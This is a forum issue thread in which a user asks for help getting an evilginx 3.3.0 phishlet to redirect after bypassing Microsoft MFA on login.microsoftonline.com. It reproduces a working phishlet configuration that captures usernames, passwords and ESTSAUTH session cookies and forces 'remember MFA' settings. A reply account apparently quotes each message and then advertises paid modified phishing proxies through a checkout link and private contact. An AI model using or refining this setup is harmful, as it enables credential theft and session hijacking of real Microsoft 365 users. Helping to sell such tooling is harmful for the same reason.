Redirect not working after successful authentication

[kevchi9]

Hi everyone,

I'm opening an issue here since the repo I cloned doesn't support issue opening (https://github.com/kgretzky/evilginx2) and I honestly don't know if it's the official one or not. Maybe someone here can help me.

I'm trying to bypass microsoft MFA (on login.microsoftonline.com) and I got some issues with the redirect.
It seems microsoft uses some kind of URL parameters to perform multiple redirects, and even if I configure my phishlets to do a redirect on successful authentication, I always get redirected to the m365 landing page.

I'm running evilginx 3.3.0.

This is a snippet of my config.json file:

"lures": [
{
"hostname": "",
"id": "",
"info": "",
"og_desc": "",
"og_image": "",
"og_title": "",
"og_url": "",
"path": "/xxxxxxxx",
"paused": 0,
"phishlet": "mydomain",
"redirect_url": "https://en.wikipedia.org/",
"redirector": "",
"ua_filter": ""
}
]

I also tried to configure a sub_filter (which sould be supported by this version) as follows:

sub_filters:

• {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://m365.cloud.microsoft', replace: 'https://en.wikipedia.org/', mimes: ['text/html', 'application/json', 'application/javascript']}

I tried using different syntaxes on the search field (the one I pasted is just the last one I tried).

None of these worked for me. What should I try next?

[EvilWhales]

Hi everyone,

I'm opening an issue here since the repo I cloned doesn't support issue opening (https://github.com/kgretzky/evilginx2) and I honestly don't know if it's the official one or not. Maybe someone here can help me.

I'm trying to bypass microsoft MFA (on login.microsoftonline.com) and I got some issues with the redirect. It seems microsoft uses some kind of URL parameters to perform multiple redirects, and even if I configure my phishlets to do a redirect on successful authentication, I always get redirected to the m365 landing page.

I'm running evilginx 3.3.0.

This is a snippet of my config.json file:

"lures": [ { "hostname": "", "id": "", "info": "", "og_desc": "", "og_image": "", "og_title": "", "og_url": "", "path": "/xxxxxxxx", "paused": 0, "phishlet": "mydomain", "redirect_url": "https://en.wikipedia.org/", "redirector": "", "ua_filter": "" } ]

I also tried to configure a sub_filter (which sould be supported by this version) as follows:

sub_filters:

• {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://m365.cloud.microsoft', replace: 'https://en.wikipedia.org/', mimes: ['text/html', 'application/json', 'application/javascript']}

I tried using different syntaxes on the search field (the one I pasted is just the last one I tried).

None of these worked for me. What should I try next?

show what configuration of the phishlet itself you use, to understand what the reason might be.

[kevchi9]

Sorry for taking forever replying.

The configuration of the phishlet is as follows:

name: 'microsoft'
author: '@faelsfernandes'
min_ver: '2.4.0'
proxy_hosts:

• {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}

sub_filters:
auth_tokens:

• domain: '.login.microsoftonline.com'
  keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT','SignInStateCookie',]
• domain: 'login.microsoftonline.com'
  keys: ['ESTSAUTHLIGHT']

credentials:
username:
key: 'login'
search: '(.)'
type: 'post'
password:
key: 'passwd'
search: '(.)'
type: 'post'
login:
domain: 'login.microsoftonline.com'
path: '/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0SKU=ID_NET8_0&x-client-ver=8.5.0.0'
force_post:

• path: '/kmsi'
  search:
  • {key: 'LoginOptions', search: '.*'}
    force:
  • {key: 'LoginOptions', value: '1'}
    type: 'post'
• path: '/common/SAS'
  search:
  • {key: 'rememberMFA', search: '.*'}
    force:
  • {key: 'rememberMFA', value: 'true'}
    type: 'post'

Here the redirect_url is not defined, it is defined also directly in the Evilginx interface with:

lures edit 2 redirect_url https://www.wikipedia.org

Then, if I run "lures 2" I get:

phishlet : microsoft
hostname :
path : /update
redirector :
ua_filter :
redirect_url : https://www.wikipedia.org/
paused :
info :
og_title :
og_desc :
og_image :
og_url :

[EvilWhales]

Sorry for taking forever replying.

The configuration of the phishlet is as follows:

name: 'microsoft'
author: '@faelsfernandes'
min_ver: '2.4.0'
proxy_hosts:

• {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}

sub_filters:
auth_tokens:

• domain: '.login.microsoftonline.com'
  keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT','SignInStateCookie',]
• domain: 'login.microsoftonline.com'
  keys: ['ESTSAUTHLIGHT']

credentials:
username:
key: 'login'
search: '(.)'
type: 'post'
password:
key: 'passwd'
search: '(.)'
type: 'post'
login:
domain: 'login.microsoftonline.com'
path: '/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0SKU=ID_NET8_0&x-client-ver=8.5.0.0'
force_post:

• path: '/kmsi'
  search:
  • {key: 'LoginOptions', search: '.*'}
    force:
  • {key: 'LoginOptions', value: '1'}
    type: 'post'
• path: '/common/SAS'
  search:
  • {key: 'rememberMFA', search: '.*'}
    force:
  • {key: 'rememberMFA', value: 'true'}
    type: 'post'

Here the redirect_url is not defined, it is defined also directly in the Evilginx interface with:

lures edit 2 redirect_url https://www.wikipedia.org

Then, if I run "lures 2" I get:

phishlet : microsoft
hostname :
path : /update
redirector :
ua_filter :
redirect_url : https://www.wikipedia.org/
paused :
info :
og_title :
og_desc :
og_image :
og_url :

Your file is very old and does not contain all the parameters for a full-fledged proxy.

[kevchi9]

What parameters am I missing? I used the template files, and the repo has been cloned recently.

[EvilWhales]

What parameters am I missing? I used the template files, and the repo has been cloned recently.

Most of the repositories are cloned for no reason, which does not mean that this is their software. You can find more information on our website, as well as on the Discord server, where you can find modifications of EvilGinx, modlishks, evilpuppet, and other real-time proxy projects based on node js.

lab.evilginx.dev

https://subscord.com/store/1397884713951170610/checkout/b_ivqWct-Nzgw

[kevchi9]

So do I need to become a member to download the latest version? I saw that the last version available on all the repositories I found is the 3.3. And in the lab.evilginx.dev you sent me it refers to a 3.7 version.

[EvilWhales]

So do I need to become a member to download the latest version? I saw that the last version available on all the repositories I found is the 3.3. And in the lab.evilginx.dev you sent me it refers to a 3.7 version.

send me your telegram or tox to get in touch